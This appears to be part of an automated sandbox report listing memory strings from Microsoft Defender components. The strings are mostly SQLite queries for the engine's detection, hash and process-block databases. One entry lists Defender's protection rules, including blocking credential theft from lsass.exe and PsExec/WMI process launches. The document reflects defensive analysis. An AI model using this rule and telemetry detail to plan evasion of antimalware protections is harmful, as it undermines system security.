Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO RollingQueuesTables(Key, Name, Capacity, TimeToLive, Mode) VALUES(? , ? , ? , ? , ?); DELETE FROM RollingQueuesTables WHERE RollingQueuesTables.Key = ?; DELETE FROM RollingQueuesTables WHERE (Name NOT IN (SELECT DISTINCT EntryTable FROM RollingQueuesValues)); SELECT Key, Name, Capacity, TimeToLive, Mode FROM RollingQueuesTables WHERE Key = ?; SELECT Key FROM RollingQueuesTables WHERE RollingQueuesTables.Key = ?; SELECT EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime FROM RollingQueuesValues WHERE EntryTable = ?; INSERT INTO RollingQueuesValues(EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?); DELETE FROM RollingQueuesValues WHERE ExpireTime < ?; DELETE FROM RollingQueuesTables; DELETE FROM RollingQueuesValues; SELECT COUNT(1) FROM RollingQueuesValues; Failed to fetch row from prepared statement.Failed to get column from prepared statement.Failed to bind value to prepared statement.
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM FileHashes WHERE FileHashes.Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM RansomwareDetections;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM NetworkIpFirewallRules;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO RollingQueuesValues(EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 0000000B.00000003.18227480207.0000021B4F0DB000.00000004.00000001.sdmp Binary or memory string: SELECT Key, Name, Count, InsertTime, ExpireTime, UpdateTime FROM AtomicCounters WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n FROM FileHashes WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AutoFeatureControl(Key, CurrCount, MaxCount, InstanceTimeStamp) VALUES (?, ?, ?, ?);DELETE FROM AutoFeatureControl;DELETE FROM AutoFeatureControl WHERE InstanceTimeStamp < ?; SELECT ID FROM AutoFeatureControl WHERE AutoFeatureControl.Key = ?;SELECT Key, CurrCount, MaxCount, InstanceTimeStamp FROM AutoFeatureControl WHERE Key = ?DELETE FROM AutoFeatureControl WHERE AutoFeatureControl.Key = ?;SELECT Count(1) FROM AutoFeatureControl;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM FileLowFiAsync;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces FROM BackupProcessInfo WHERE Key = ?;SELECT Count(1) FROM BackupProcessInfo;SELECT ID FROM BackupProcessInfo WHERE Key = ?;INSERT INTO BackupProcessInfo(Key, FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?);DELETE FROM BackupProcessInfo WHERE Key = ?;DELETE FROM BackupProcessInfo WHERE InstanceTimeStamp < ?; ^;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID from RecordIdentifier WHERE Key = ? AND RecordTimeStamp = ? ;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM SystemFileCache WHERE CleanFileShaHash = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(6, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(14, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO FolderGuardPaths(UserIdHash, UserId, GUID, Path) VALUES ( ?, ?, ?, ? );SELECT ID FROM FolderGuardPaths WHERE UserIdHash = ? LIMIT 1;SELECT UserId, GUID, Path FROM FolderGuardPaths WHERE UserIdHash = ?SELECT Count(DISTINCT UserIdHash) FROM FolderGuardPaths;DELETE FROM FolderGuardPaths WHERE UserIdHash = ?;N
Source: MpSigStub.exe, 0000000B.00000003.18242140294.0000021B4FF6A000.00000004.00000001.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ? ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE RuleId = ? ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(4, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key, Name, Capacity, TimeToLive, Mode FROM RollingQueuesTables WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmFileStartupActions(FilePathHash, FilePath, ActionFlags, ProcessStartCount, FdrFlags, FdrThreatRecordId, EvaluatorThreatRecordId, TrustedInstallerThreatRecordId, LFRThreatRecordId) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmFileActions(FileInfoId, ThreatRecordId, Action) VALUES (?, ?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(5, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM FolderGuardPaths WHERE UserIdHash = ? LIMIT 1;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO RansomwareDetections(Key, DetectionGuid, LkgTS, NextUSN, DetectionTS, ProvisionalRemedComplTS, RemedComplTS, ImpactedCBPNameSpaces, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(12, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT CleanFileSha, CleanFileShaHash FROM SystemFileCache WHERE InstanceTimeStamp < ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT PersistId, PersistIdBlob, ExpirationDate FROM AmsiFileCache WHERE ExpirationDate < DateTime(?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key, RecordTimeStamp, Generation FROM RecordIdentifier WHERE RecordIdentifier.ID IN (SELECT FileInstance.RecordID from FileInstance WHERE FileInstance.ParentRecordID = ? );
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT RuleAction, RuleId, IsAudit, IsInherited, State FROM BmHipsRuleInfo WHERE ProcessInfoId = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key, FirewallRuleName, ExpiryTime FROM NetworkIpFirewallRules WHERE ExpiryTime < ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM SystemFileCache;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC LIMIT 1;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmFileInfo(NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM SdnEx;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(3, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO FileInstance(InstanceTimeStamp, RecordID, ScanID, TrackingEnabled, StorageEvent, StorageEventState, ModificationsCount, ParentRecordID, Parent_FileEvent, Parent_FileName, Parent_ProcessID, Remote_ProcessID, FileID, FileName, USN, CreateTime, LastAccessTime, LastWriteTime, Signer, SignerHash, Issuer, SigningTime, MOTW, MOTWFromParent,IsValidCert, CertInvalidDetails, IsCatalogSigned) VALUES(?, ? , ?, ?, ?, ? , ? , ? , ? , ? , ?, ?, ?, ?, ?, ? , ? , ? , ? , ? , ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime FROM RollingQueuesValues WHERE EntryTable = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Version, Current, LastUpdated FROM SQLiteGlobals WHERE Current = 1 ORDER BY Version DESC ;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM AmsiFileCache WHERE AmsiFileCache.PersistId = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AttributeCounts(Key, Name, Count, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(28, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AttributePersistContext(Key, FilePath, Context, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID from File WHERE SHA1 = ? ;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO ScanInfo(SigSeq, PersistSigSeq, ProgenitorPersistSigSeq, ScanAgent, NamedAttributes, PeAttributes, SigAttrEvents, ScanReason, WebURL, EngineID, SigSha) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? );
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(DISTINCT ProcessPath) FROM ProcessBlockHistory;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM Engine WHERE EngineVersion = ? AND SigVersion = ? ;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AmsiFileCache(PersistId, PersistIdBlob, ExpirationDate) VALUES (?, ?, DateTime('now', ?));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM SdnEx WHERE SdnEx.Key = ?;SELECT Key, CurrentCount FROM SdnEx WHERE Key = ?DELETE FROM SdnEx WHERE SdnEx.Key = ?;SELECT Count(1) FROM SdnEx;INSERT INTO SdnEx(Key, CurrentCount) VALUES (?, ?);DELETE FROM SdnEx;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AttributePersistContext;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM SystemRegistryCache;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(24, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID, NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(11, 1, date('now'));
Source: mpam-728dfe11.exe, 00000011.00000003.18599366058.0000027770042000.00000004.00000001.sdmp, MpSigStub.exe, 00000012.00000003.18632031350.000002DF229C1000.00000004.00000001.sdmp Binary or memory string: Select ActionPA6Block executable content from email client and webmail;Block all Office applications from creating child processes:Block Office applications from creating executable contentBBlock Office applications from injecting code into other processesIBlock JavaScript or VBScript from launching downloaded executable content1Block execution of potentially obfuscated scripts'Block Win32 API calls from Office macro`Block executable files from running unless they meet a prevalence, age, or trusted list criteria*Use advanced protection against ransomwareYBlock credential stealing from the Windows local security authority subsystem (lsass.exe)@Block process creations originating from PSExec and WMI commands8Block untrusted and unsigned processes that run from USBJBlock only Office communication applications from creating child processes0Block Adobe Reader from creating child processesPA)Antimalware engine has stopped responding
Source: MpSigStub.exe, 0000000B.00000003.18227480207.0000021B4F0DB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(31, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18227480207.0000021B4F0DB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);SELECT Count(1) FROM DynSigRevisions;DELETE FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;SELECT Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision FROM DynSigRevisions WHERE Key = ?SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT InfectedFileSHA, ProcFileId, SystemFilePath, CleanFileSha FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ? ORDER BY InstanceTimeStamp DESC;
Source: MpSigStub.exe, 0000000B.00000003.18225498885.0000021B4EEFC000.00000004.00000001.sdmp Binary or memory string: SELECT 1 FROM SQLITE_MASTER WHERE type=? AND name=? LIMIT 1;Engine.MetaStore.DBVaultUtilizationMpDisableTaskSchedCmdLineScanMb=Lk
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM AutoFeatureControl WHERE AutoFeatureControl.Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AnomalyTables(Key, TableKey, TableName, KeyName, FirstSeen, LastSeen, UnbiasedMinutes, Value, Order_) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SystemFileCache(InfectedFileSHAHash, InfectedFileSHA, ProcFileIDSystemFileHash, ProcFileId, SystemFilePath, CleanFileSha, CleanFileShaHash, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(16, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(8, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(26, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key, TableKey, TableName, KeyName, FirstSeen, LastSeen, UnbiasedMinutes, Value, Order_ FROM AnomalyTables WHERE AnomalyTables.TableKey = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AnomalyTables;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM FileHashes; DELETE FROM FileHashes WHERE FileHashes.Key = ?; DELETE FROM FileHashes WHERE InstanceTimeStamp < ?; INSERT INTO FileHashes(Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n) VALUES(?, ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ?);SELECT Key FROM FileHashes WHERE FileHashes.Key = ?; SELECT Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n FROM FileHashes WHERE Key = ?; SELECT Key FROM FileHashes ORDER BY InstanceTimeStamp ASC LIMIT 1
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(30, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18227480207.0000021B4F0DB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?; SELECT Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp FROM FileLowFiAsync WHERE Key = ?; SELECT COUNT(1) FROM FileLowFiAsync; DELETE FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?; DELETE FROM FileLowFiAsync WHERE InstanceTimeStamp < ?; INSERT INTO FileLowFiAsync(Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp) VALUES(?, ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Count(DISTINCT UserIdHash) FROM FolderGuardPaths;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID, PPIDHash, ProcessStartTime, PID, StructVersion, ImageFileName, MonitoringFlags_Flags, MonitoringFlags_VmHardenType, MonitoringFlags_ExemptVmHardenedTypes, CommandLineArgs, HipsInjectionId, FolderGuardId, Flags, LsassReadMemId, MonitoringFlags_Flags2Low, MonitoringFlags_Flags2High FROM BmProcessInfo WHERE PPIDHash = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AutoFeatureControl(Key, CurrCount, MaxCount, InstanceTimeStamp) VALUES (?, ?, ?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AtomicCounters ORDER BY InsertTime ASC LIMIT 1;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AtomicCounters(Key, Name, Count, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(20, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT PersistId, PersistIdBlob, ExpirationDate FROM AmsiFileCache WHERE PersistId = ?;
Source: MpSigStub.exe, 0000000B.00000003.18227480207.0000021B4F0DB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(31, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AtomicCounters WHERE AtomicCounters.Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(18, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM BmProcessInfo WHERE PPIDHash = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AnomalyInfo;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ValueMapArrayBlob FROM ValueMapArray WHERE Key = ? AND RecordType = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AttributeCounts WHERE AttributeCounts.Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;SELECT Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision FROM DynSigRevisions WHERE Key = ?SELECT Count(1) FROM DynSigRevisions;SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AttributeCounts ORDER BY InsertTime ASC LIMIT 1;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory WHERE RuleId = ? GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM ValueMapArray WHERE ValueMapArray.Key = ? AND ValueMapArray.RecordType = ?;
